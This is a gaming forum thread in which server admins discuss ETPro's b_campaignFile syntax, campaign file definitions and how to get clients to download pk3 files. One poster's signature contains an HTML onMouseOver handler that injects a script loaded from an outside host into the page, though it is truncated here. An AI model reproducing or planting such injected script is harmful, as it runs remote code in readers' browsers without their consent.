2.06 Beta Syntax

Discussion for Admins of ETPro/BayonET servers.
If you don't run a server, please don't post here...

Moderators: Forum moderators, developers

User avatar
WSF|Otter
Posts: 97
Joined: Fri Oct 17, 2003 7:25 am
Location: Missouri
Contact:

2.06 Beta Syntax

Post by WSF|Otter »

I want to try and use the b_campaignFile setting in my configs, but just need to know the proper syntax.

Do you reference the .cfg file that loads a campaign?

example: set b_campaignFile "wsfetpro.cfg"

Or... Do you reference the .pk3 file?


Thanks
WSF|Otter
Founder and Leader
Wolf Strike Force
http://wolfstrikeforce.com
WSF ET Pro Game Server - 69.57.143.174:27960
User avatar
=FF=im2good4u
Posts: 3821
Joined: Wed Feb 05, 2003 7:30 am
Location: The Netherlands, HOLLAND
Contact:

Post by =FF=im2good4u »

i tought to the .pk3 file :roll:

Code: Select all

new: b_campaignFile allows admin to specify specific campaign file, to prevent server from referencing every pk3 on the server and forcing players to download every referenced pk3 on the server
uber-noob
Posts: 285
Joined: Sat Dec 20, 2003 2:02 pm
Location: Germany
Contact:

Post by uber-noob »

The Syntax is

Code: Select all

b_campaignFile "scripts/xxx.campaign"
at least it works this way for me.
User avatar
WSF|Otter
Posts: 97
Joined: Fri Oct 17, 2003 7:25 am
Location: Missouri
Contact:

Post by WSF|Otter »

That makes sense.... :D


Thanks Uber... :)
WSF|Otter
Founder and Leader
Wolf Strike Force
http://wolfstrikeforce.com
WSF ET Pro Game Server - 69.57.143.174:27960
User avatar
=FF=im2good4u
Posts: 3821
Joined: Wed Feb 05, 2003 7:30 am
Location: The Netherlands, HOLLAND
Contact:

Post by =FF=im2good4u »

ups
User avatar
Chairman Kaga
Posts: 64
Joined: Mon Aug 04, 2003 9:00 pm

Post by Chairman Kaga »

What if you have more than one campaign?
Steve (aka Chairman Kaga)
Proud member of Major League Killers
=MLK= International House of Panzer: 64.185.229.60:27960
uber-noob
Posts: 285
Joined: Sat Dec 20, 2003 2:02 pm
Location: Germany
Contact:

Post by uber-noob »

Chairman Kaga wrote:What if you have more than one campaign?
Put them in the same file. You can define more then one campaign inside a single file, just make shure they don't have the same (short)name.

For example place both in the same file.

Code: Select all

{
	name		 "xxx 1"
	shortname      "cmpgn_xxx1"
	description	 " Campaign 1"
	maps		  "battery;goldrush;radar"
	mapTC			374 374
	type			"wolfmp"
}

{
	name		 "xxx 2"
	shortname      "cmpgn_xxx2"
	description	 "Campaign 2"
	maps		  "northpole;mp_beach;fueldump"
	mapTC			374 374
	type			"wolfmp"
}
User avatar
Chairman Kaga
Posts: 64
Joined: Mon Aug 04, 2003 9:00 pm

Post by Chairman Kaga »

Ah, I didn't know that was possible. Leet.

Now I have to remember which pk3s I hacked the campaigns out of...
Steve (aka Chairman Kaga)
Proud member of Major League Killers
=MLK= International House of Panzer: 64.185.229.60:27960
User avatar
WSF|Otter
Posts: 97
Joined: Fri Oct 17, 2003 7:25 am
Location: Missouri
Contact:

Post by WSF|Otter »

Put them in the same file. You can define more then one campaign inside a single file, just make shure they don't have the same (short)name.
Then which campaign starts if your server is restarted?

The first one?
WSF|Otter
Founder and Leader
Wolf Strike Force
http://wolfstrikeforce.com
WSF ET Pro Game Server - 69.57.143.174:27960
User avatar
Rain
Posts: 635
Joined: Sat Aug 02, 2003 3:44 pm
Location: Muffin Laboratories
Contact:

Post by Rain »

WSF|Otter wrote:Then which campaign starts if your server is restarted?

The first one?
Neither. The server configuration has to explicitly load a campaign.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
User avatar
WSF|Otter
Posts: 97
Joined: Fri Oct 17, 2003 7:25 am
Location: Missouri
Contact:

Post by WSF|Otter »

That's what I thought.... :)

Thanks Rain...
WSF|Otter
Founder and Leader
Wolf Strike Force
http://wolfstrikeforce.com
WSF ET Pro Game Server - 69.57.143.174:27960
User avatar
V6.Sven
Posts: 86
Joined: Fri Jan 23, 2004 10:12 am
Location: Netherlands!

Post by V6.Sven »

Is it possable to use this to force the client to download a specific pk3 that doens't contain a map file? I made a soundpack which doesn't get downloaded to the client automatically. It only works if the client downloaded it from my site. It would be easier if they got it automatically.
User avatar
=FF=im2good4u
Posts: 3821
Joined: Wed Feb 05, 2003 7:30 am
Location: The Netherlands, HOLLAND
Contact:

Post by =FF=im2good4u »

try putting a champaing into it :)

our =FF= server also has all stuff inside 1 file
uber-noob
Posts: 285
Joined: Sat Dec 20, 2003 2:02 pm
Location: Germany
Contact:

Post by uber-noob »

V6.Sven wrote:Is it possable to use this to force the client to download a specific pk3 that doens't contain a map file? I made a soundpack which doesn't get downloaded to the client automatically. It only works if the client downloaded it from my site. It would be easier if they got it automatically.
Just put it into the etpro instead of etmain directory. Every .pk3 within the etpro dir has to exist also on the clients.
Moonman
Posts: 1
Joined: Thu Feb 12, 2004 3:36 am

Post by Moonman »

What exactly would I do, if I wanted to run the normal 3 Map Campaigns, but wanted to have Custom Maps in the ETMain Dir aswell for when/if someone needs the server to scrim on?

I confused myself with all this, so any help would be great :D.
Post Reply